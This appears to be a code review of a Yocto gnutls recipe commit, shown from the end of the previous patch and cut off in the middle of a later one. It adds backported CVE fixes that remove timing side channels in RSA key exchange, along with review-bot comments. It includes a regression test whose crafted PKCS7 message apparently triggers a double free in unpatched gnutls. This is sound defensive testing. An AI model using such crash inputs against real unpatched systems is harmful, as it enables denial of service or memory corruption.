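++ "i/7FsbG0OFKGF2+JOnth6NjJQcMfM8LiglqAuBUijrv7vltoZ0Z3FJH1Vi4OeMXn\n"
++ "l7X/9tWUve0uFl75MfjDrf0+lCEdYRY1LCba2BrUgpbbkLywVUdnbsvndehegCgS\n"
++ "jss2/zys3Hlo3ZaHlTMQ/NQ4nrxcxkjOvkZSEOqgxJTLpzm6pr7YUts4k6c6lNiB\n"
++ "FSiJiDzsJCmWR9C3fBbUlfDfTJYGN3JwqX270KchXDElo8gNoDnF7jBMpLFFSEKm\n"
++ "MyfbNLX/srh+CEfZaN/OZV4A3MQ0L8vQEp6M4CJhvRLIuMVabZ2coJ0AzystrOMU\n"
++ "LirBWjg89RoAjFQ7bTE=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDQzNFoYDzIyMjIwNzIxMTQ0NDM0WjAiMSAwHgYD\n"
++ "VQQKDBdFeGFtcGxlIGludGVybWVkaWF0ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAKb9ACB8u//sP6MfNU1OsVw68xz3eTPLgKxS0vpqexm6iGVg\n"
++ "ug/o9uYRLzqiEukv/eyz9WzHmY7sqlOJjOFdv92+SaNg79Jc51WHPFXgea4/qyfr\n"
++ "4y14PGs0SNxm6T44sXurUs7cXydQVUgnq2VCaWFOTUdxXoAWkV8r8GaUoPD/klVz\n"
++ "RqxSZVETmX1XBKhsMnnov41kRwVph2C+VfUspsbaUZaz/o/S1/nokhXRACzKsMBr\n"
++ "obqiGxbY35uVzsmbAW5ErhQz98AWJL3Bub1fsEMXg6OEMmPH4AtX888dTIYZNw0E\n"
++ "bUIESspz1kjJQTtVQDHTprhwz16YiSVeUonlLgMCAwEAAaNjMGEwDwYDVR0TAQH/\n"
++ "BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPBjxDWjMhjXERirKF9O\n"
++ "o/5Cllc5MB8GA1UdIwQYMBaAFIY3julHOYpm4zpdiNpbVQNux7vWMA0GCSqGSIb3\n"
++ "DQEBCwUAA4IBAQCTm+vv3hBa6lL5IT+Fw8aTxQ2Ne7mZ5oyazhvXYwwfKNMX3SML\n"
++ "W2JdPaL64ZwbxxxYvW401o5Z0CEgru3YFrsqB/hEdl0Uf8UWWJmE1rRa+miTmbjt\n"
++ "lrLNCWdrs6CiwvsPITTHg7jevB4KyZYsTSxQFcyr3N3xF+6EmOTC4IkhPPnXYXcp\n"
++ "248ih+WOavSYoRvzgB/Dip1WnPYU2mfIV3O8JReRryngA0TzWCLPLUoWR3R4jwtC\n"
++ "+1uSLoqaenz3qv3F1WEbke37az9YJuXx/5D8CqFQiZ62TUUtI6fYd8mkMBM4Qfh6\n"
++ "NW9XrCkI9wlpL5K9HllhuW0BhKeJkuPpyQ2p\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ee_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdFeGFt\n"
++ "cGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzdaGA8yMjIyMDcyMTE0\n"
++ "NDUzN1owFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAMb1uuxppBFY+WVD45iyHUq7DkIJNNOI/JRaybVJfPktWq2E\n"
++ "eNe7XhV05KKnqZTbDO2iYqNHqGhZ8pz/IstDRTZP3z/q1vXTG0P9Gx28rEy5TaUY\n"
++ "QjtD+ZoFUQm0ORMDBjd8jikqtJ87hKeuOPMH4rzdydotMaPQSm7KLzHBGBr6gg7z\n"
++ "g1IxPWkhMyHapoMqqrhjwjzoTY97UIXpZTEoIA+KpEC8f9CciBtL0i1MPBjWozB6\n"
++ "Jma9q5iEwZXuRr3cnPYeIPlK2drgDZCMuSFcYiT8ApLw5OhKqY1m2EvfZ2ox2s9R\n"
++ "68/HzYdPi3kZwiNEtlBvMlpt5yKBJAflp76d7DkCAwEAAaNuMGwwCwYDVR0PBAQD\n"
++ "AgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQUc+Mi\n"
++ "kr8WMCk00SQo+P2iggp/oQkwHwYDVR0jBBgwFoAU8GPENaMyGNcRGKsoX06j/kKW\n"
++ "VzkwDQYJKoZIhvcNAQELBQADggEBAKU9+CUR0Jcfybd1+8Aqgh1RH96yQygnVuyt\n"
++ "Na9rFz4fM3ij9tGXDHXrkZw8bW1dWLU9quu8zeTxKxc3aiDIw739Alz0tukttDo7\n"
++ "dW7YqIb77zsIsWB9p7G9dlxT6ieUy+5IKk69BbeK8KR0vAciAG4KVQxPhuPy/LGX\n"
++ "PzqlJIJ4h61s3UOroReHPB1keLZgpORqrvtpClOmABH9TLFRJA/WFg8Q2XYB/p0x\n"
++ "l/pWiaoBC+8wK9cDoMUK5yOwXeuCLffCb+UlAD0+z/qxJ2pisE8E9X8rRKRrWI+i\n"
++ "G7LtJCEn86EQK8KuRlJxKgj8lClZhoULB0oL4jbblBuNow9WRmM=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char msg_pem[] =
++ "-----BEGIN PKCS7-----\n"
++ "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\n"
++ "-----END PKCS7-----\n";
++
++const gnutls_datum_t rca_datum = { (void *)rca_pem, sizeof(rca_pem) - 1 };
++const gnutls_datum_t ca_datum = { (void *)ca_pem, sizeof(ca_pem) - 1 };
++const gnutls_datum_t ee_datum = { (void *)ee_pem, sizeof(ee_pem) - 1 };
++const gnutls_datum_t msg_datum = { (void *)msg_pem, sizeof(msg_pem) - 1 };
++
++static void tls_log_func(int level, const char *str)
++{
++ fprintf(stderr, "%s |<%d>| %s", "err", level, str);
++}
++
++#define CHECK(X)\
++{\
++ r = X;\
++ if (r < 0)\
++ fail("error in %d: %s\n", __LINE__, gnutls_strerror(r));\
++}\
++
++void doit(void)
++{
++ int r;
++ gnutls_x509_crt_t rca_cert = NULL;
++ gnutls_x509_crt_t ca_cert = NULL;
++ gnutls_x509_crt_t ee_cert = NULL;
++ gnutls_x509_trust_list_t tlist = NULL;
++ gnutls_pkcs7_t pkcs7 = NULL;
++ gnutls_datum_t data = { (unsigned char *)"xxx", 3 };
++
++ if (debug) {
++ gnutls_global_set_log_function(tls_log_func);
++ gnutls_global_set_log_level(4711);
++ }
++
++ // Import certificates
++ CHECK(gnutls_x509_crt_init(&rca_cert));
++ CHECK(gnutls_x509_crt_import(rca_cert, &rca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ca_cert));
++ CHECK(gnutls_x509_crt_import(ca_cert, &ca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ee_cert));
++ CHECK(gnutls_x509_crt_import(ee_cert, &ee_datum, GNUTLS_X509_FMT_PEM));
++
++ // Setup trust store
++ CHECK(gnutls_x509_trust_list_init(&tlist, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, rca_cert, "rca", 3, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ca_cert, "ca", 2, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ee_cert, "ee", 2, 0));
++
++ // Setup pkcs7 structure
++ CHECK(gnutls_pkcs7_init(&pkcs7));
++ CHECK(gnutls_pkcs7_import(pkcs7, &msg_datum, GNUTLS_X509_FMT_PEM));
++
++ // Signature verification
++ gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);
++
++ gnutls_x509_crt_deinit(rca_cert);
++ gnutls_x509_crt_deinit(ca_cert);
++ gnutls_x509_crt_deinit(ee_cert);
++ gnutls_x509_trust_list_deinit(tlist, 0);
++ gnutls_pkcs7_deinit(pkcs7);
++}
+--
+2.25.1
+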
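Review bot: In the new test `tests/pkcs7-verify-double-free.c`, the call `gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);` discards its return value while every other GnuTLS call in `doit` that returns a status goes through `CHECK`, and nothing says this is deliberate. As written the test can only fail if the process crashes, so it catches a regression of the `prev != signer` fix only when the allocator or a memory checker aborts on the double free. I would add a comment above the call such as `/* result is irrelevant: the test passes if verification returns without a double free */`. Separately, the NEWS hunk places the 2022 entry under the `* Version 3.6.14 (released 2020-06-03)` heading, which reads as if that release already contained the fix.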
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
new file mode 100644
index 0000000000..943f4ca704
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
@@ -0,0 +1,85 @@
1From 80a6ce8ddb02477cd724cd5b2944791aaddb702a Mon Sep 17 00:00:00 2001
2From: Alexander Sosedkin <asosedkin@redhat.com>
3Date: Tue, 9 Aug 2022 16:05:53 +0200
4Subject: [PATCH] auth/rsa: side-step potential side-channel
5
6Signed-off-by: Alexander Sosedkin <asosedkin@redhat.com>
7Signed-off-by: Hubert Kario <hkario@redhat.com>
8Tested-by: Hubert Kario <hkario@redhat.com>
9Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/80a6ce8ddb02477cd724cd5b2944791aaddb702a
10 https://gitlab.com/gnutls/gnutls/-/commit/4b7ff428291c7ed77c6d2635577c83a43bbae558]
11CVE: CVE-2023-0361
12Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
13---
14 lib/auth/rsa.c | 30 +++---------------------------
15 1 file changed, 3 insertions(+), 27 deletions(-)
16
17diff --git a/lib/auth/rsa.c b/lib/auth/rsa.c
18index 8108ee8..858701f 100644
19--- a/lib/auth/rsa.c
20+++ b/lib/auth/rsa.c
21@@ -155,13 +155,10 @@ static int
22 proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
23 size_t _data_size)
24 {
25- const char attack_error[] = "auth_rsa: Possible PKCS #1 attack\n";
26 gnutls_datum_t ciphertext;
27 int ret, dsize;
28 ssize_t data_size = _data_size;
29 volatile uint8_t ver_maj, ver_min;
30- volatile uint8_t check_ver_min;
31- volatile uint32_t ok;
32
33 #ifdef ENABLE_SSL3
34 if (get_num_version(session) == GNUTLS_SSL3) {
35@@ -187,7 +184,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
36
37 ver_maj = _gnutls_get_adv_version_major(session);
38 ver_min = _gnutls_get_adv_version_minor(session);
39- check_ver_min = (session->internals.allow_wrong_pms == 0);
40
41 session->key.key.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
42 if (session->key.key.data == NULL) {
43@@ -206,10 +202,9 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
44 return ret;
45 }
46
47- ret =
48- gnutls_privkey_decrypt_data2(session->internals.selected_key,
49- 0, &ciphertext, session->key.key.data,
50- session->key.key.size);
51+ gnutls_privkey_decrypt_data2(session->internals.selected_key,
52+ 0, &ciphertext, session->key.key.data,
53+ session->key.key.size);
54 /* After this point, any conditional on failure that cause differences
55 * in execution may create a timing or cache access pattern side
56 * channel that can be used as an oracle, so treat very carefully */
57@@ -225,25 +220,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
58 * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
59 */
60
61- /* ok is 0 in case of error and 1 in case of success. */
62-
63- /* if ret < 0 */
64- ok = CONSTCHECK_EQUAL(ret, 0);
65- /* session->key.key.data[0] must equal ver_maj */
66- ok &= CONSTCHECK_EQUAL(session->key.key.data[0], ver_maj);
67- /* if check_ver_min then session->key.key.data[1] must equal ver_min */
68- ok &= CONSTCHECK_NOT_EQUAL(check_ver_min, 0) &
69- CONSTCHECK_EQUAL(session->key.key.data[1], ver_min);
70-
71- if (ok) {
72- /* call logging function unconditionally so all branches are
73- * indistinguishable for timing and cache access when debug
74- * logging is disabled */
75- _gnutls_no_log("%s", attack_error);
76- } else {
77- _gnutls_debug_log("%s", attack_error);
78- }
79-
80 /* This is here to avoid the version check attack
81 * discussed above.
82 */
83--
842.25.1
85
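Review bot: The call to `gnutls_privkey_decrypt_data2()` in the `@@ -206,10 +202,9 @@` hunk now discards its return value, and nothing at the call site says this is deliberate. A later cleanup or a static-analysis fix could restore `ret = ...` and a branch on it, which is the data-dependent path this patch removes. I would add a comment directly above the call, e.g. `/* result deliberately ignored: branching on it would recreate the decryption oracle; on failure the fallback key is used */`. The fallback setup is outside the hunk, so confirm that wording against the full function. The same unannotated call is added in the `rsa_psk.c` hunks of CVE-2023-5981.patch and CVE-2024-0553.patch; `proc_rsa_client_kx` starts and ends outside these hunks.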
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
new file mode 100644
index 0000000000..c518cfa0ac
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
@@ -0,0 +1,206 @@
1Backport of:
2
3From 29d6298d0b04cfff970b993915db71ba3f580b6d Mon Sep 17 00:00:00 2001
4From: Daiki Ueno <ueno@gnu.org>
5Date: Mon, 23 Oct 2023 09:26:57 +0900
6Subject: [PATCH] auth/rsa_psk: side-step potential side-channel
7
8This removes branching that depends on secret data, porting changes
9for regular RSA key exchange from
104804febddc2ed958e5ae774de2a8f85edeeff538 and
1180a6ce8ddb02477cd724cd5b2944791aaddb702a. This also removes the
12allow_wrong_pms as it was used sorely to control debug output
13depending on the branching.
14
15Signed-off-by: Daiki Ueno <ueno@gnu.org>
16
17Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/gnutls28/3.6.13-2ubuntu1.9/gnutls28_3.6.13-2ubuntu1.9.debian.tar.xz
18Upstream-Commit: https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]
19CVE: CVE-2023-5981
20Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
21---
22 lib/auth/rsa.c | 2 +-
23 lib/auth/rsa_psk.c | 90 ++++++++++++++++++----------------------------
24 lib/gnutls_int.h | 4 ---
25 lib/priority.c | 1 -
26 4 files changed, 35 insertions(+), 62 deletions(-)
27
28--- a/lib/auth/rsa.c
29+++ b/lib/auth/rsa.c
30@@ -207,7 +207,7 @@ proc_rsa_client_kx(gnutls_session_t sess
31 session->key.key.size);
32 /* After this point, any conditional on failure that cause differences
33 * in execution may create a timing or cache access pattern side
34- * channel that can be used as an oracle, so treat very carefully */
35+ * channel that can be used as an oracle, so tread carefully */
36
37 /* Error handling logic:
38 * In case decryption fails then don't inform the peer. Just use the
39--- a/lib/auth/rsa_psk.c
40+++ b/lib/auth/rsa_psk.c
41@@ -264,14 +264,13 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
42 {
43 gnutls_datum_t username;
44 psk_auth_info_t info;
45- gnutls_datum_t plaintext;
46 gnutls_datum_t ciphertext;
47 gnutls_datum_t pwd_psk = { NULL, 0 };
48 int ret, dsize;
49- int randomize_key = 0;
50 ssize_t data_size = _data_size;
51 gnutls_psk_server_credentials_t cred;
52 gnutls_datum_t premaster_secret = { NULL, 0 };
53+ volatile uint8_t ver_maj, ver_min;
54
55 cred = (gnutls_psk_server_credentials_t)
56 _gnutls_get_cred(session, GNUTLS_CRD_PSK);
57@@ -327,71 +326,47 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
58 }
59 ciphertext.size = dsize;
60
61- ret =
62- gnutls_privkey_decrypt_data(session->internals.selected_key, 0,
63- &ciphertext, &plaintext);
64- if (ret < 0 || plaintext.size != GNUTLS_MASTER_SIZE) {
65- /* In case decryption fails then don't inform
66- * the peer. Just use a random key. (in order to avoid
67- * attack against pkcs-1 formatting).
68- */
69- gnutls_assert();
70- _gnutls_debug_log
71- ("auth_rsa_psk: Possible PKCS #1 format attack\n");
72- if (ret >= 0) {
73- gnutls_free(plaintext.data);
74- }
75- randomize_key = 1;
76- } else {
77- /* If the secret was properly formatted, then
78- * check the version number.
79- */
80- if (_gnutls_get_adv_version_major(session) !=
81- plaintext.data[0]
82- || (session->internals.allow_wrong_pms == 0
83- && _gnutls_get_adv_version_minor(session) !=
84- plaintext.data[1])) {
85- /* No error is returned here, if the version number check
86- * fails. We proceed normally.
87- * That is to defend against the attack described in the paper
88- * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
89- * Ondej Pokorny and Tomas Rosa.
90- */
91- gnutls_assert();
92- _gnutls_debug_log
93- ("auth_rsa: Possible PKCS #1 version check format attack\n");
94- }
95- }
96+ ver_maj = _gnutls_get_adv_version_major(session);
97+ ver_min = _gnutls_get_adv_version_minor(session);
98
99+ premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
100+ if (premaster_secret.data == NULL) {
101+ gnutls_assert();
102+ return GNUTLS_E_MEMORY_ERROR;
103+ }
104+ premaster_secret.size = GNUTLS_MASTER_SIZE;
105
106- if (randomize_key != 0) {
107- premaster_secret.size = GNUTLS_MASTER_SIZE;
108- premaster_secret.data =
109- gnutls_malloc(premaster_secret.size);
110- if (premaster_secret.data == NULL) {
111- gnutls_assert();
112- return GNUTLS_E_MEMORY_ERROR;
113- }
114-
115- /* we do not need strong random numbers here.
116- */
117- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
118- premaster_secret.size);
119- if (ret < 0) {
120- gnutls_assert();
121- goto cleanup;
122- }
123- } else {
124- premaster_secret.data = plaintext.data;
125- premaster_secret.size = plaintext.size;
126+ /* Fallback value when decryption fails. Needs to be unpredictable. */
127+ ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
128+ premaster_secret.size);
129+ if (ret < 0) {
130+ gnutls_assert();
131+ goto cleanup;
132 }
133
134+ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
135+ &ciphertext, premaster_secret.data,
136+ premaster_secret.size);
137+ /* After this point, any conditional on failure that cause differences
138+ * in execution may create a timing or cache access pattern side
139+ * channel that can be used as an oracle, so tread carefully */
140+
141+ /* Error handling logic:
142+ * In case decryption fails then don't inform the peer. Just use the
143+ * random key previously generated. (in order to avoid attack against
144+ * pkcs-1 formatting).
145+ *
146+ * If we get version mismatches no error is returned either. We
147+ * proceed normally. This is to defend against the attack described
148+ * in the paper "Attacking RSA-based sessions in SSL/TLS" by
149+ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
150+ */
151+
152 /* This is here to avoid the version check attack
153 * discussed above.
154 */
155-
156- premaster_secret.data[0] = _gnutls_get_adv_version_major(session);
157- premaster_secret.data[1] = _gnutls_get_adv_version_minor(session);
158+ premaster_secret.data[0] = ver_maj;
159+ premaster_secret.data[1] = ver_min;
160
161 /* find the key of this username
162 */
163--- a/lib/gnutls_int.h
164+++ b/lib/gnutls_int.h
165@@ -989,7 +989,6 @@ struct gnutls_priority_st {
166 bool _no_etm;
167 bool _no_ext_master_secret;
168 bool _allow_key_usage_violation;
169- bool _allow_wrong_pms;
170 bool _dumbfw;
171 unsigned int _dh_prime_bits; /* old (deprecated) variable */
172
173@@ -1007,7 +1006,6 @@ struct gnutls_priority_st {
174 (x)->no_etm = 1; \
175 (x)->no_ext_master_secret = 1; \
176 (x)->allow_key_usage_violation = 1; \
177- (x)->allow_wrong_pms = 1; \
178 (x)->dumbfw = 1
179
180 #define ENABLE_PRIO_COMPAT(x) \
181@@ -1016,7 +1014,6 @@ struct gnutls_priority_st {
182 (x)->_no_etm = 1; \
183 (x)->_no_ext_master_secret = 1; \
184 (x)->_allow_key_usage_violation = 1; \
185- (x)->_allow_wrong_pms = 1; \
186 (x)->_dumbfw = 1
187
188 /* DH and RSA parameters types.
189@@ -1141,7 +1138,6 @@ typedef struct {
190 bool no_etm;
191 bool no_ext_master_secret;
192 bool allow_key_usage_violation;
193- bool allow_wrong_pms;
194 bool dumbfw;
195
196 /* old (deprecated) variable. This is used for both srp_prime_bits
197--- a/lib/priority.c
198+++ b/lib/priority.c
199@@ -681,7 +681,6 @@ gnutls_priority_set(gnutls_session_t ses
200 COPY_TO_INTERNALS(no_etm);
201 COPY_TO_INTERNALS(no_ext_master_secret);
202 COPY_TO_INTERNALS(allow_key_usage_violation);
203- COPY_TO_INTERNALS(allow_wrong_pms);
204 COPY_TO_INTERNALS(dumbfw);
205 COPY_TO_INTERNALS(dh_prime_bits);
206
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
new file mode 100644
index 0000000000..f15c470879
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
@@ -0,0 +1,125 @@
1From 40dbbd8de499668590e8af51a15799fbc430595e Mon Sep 17 00:00:00 2001
2From: Daiki Ueno <ueno@gnu.org>
3Date: Wed, 10 Jan 2024 19:13:17 +0900
4Subject: [PATCH] rsa-psk: minimize branching after decryption
5
6This moves any non-trivial code between gnutls_privkey_decrypt_data2
7and the function return in _gnutls_proc_rsa_psk_client_kx up until the
8decryption. This also avoids an extra memcpy to session->key.key.
9
10Signed-off-by: Daiki Ueno <ueno@gnu.org>
11
12Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/40dbbd8de499668590e8af51a15799fbc430595e]
13CVE: CVE-2024-0553
14Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
15---
16 lib/auth/rsa_psk.c | 68 ++++++++++++++++++++++++----------------------
17 1 file changed, 35 insertions(+), 33 deletions(-)
18
19diff --git a/lib/auth/rsa_psk.c b/lib/auth/rsa_psk.c
20index 93c2dc9..c6cfb92 100644
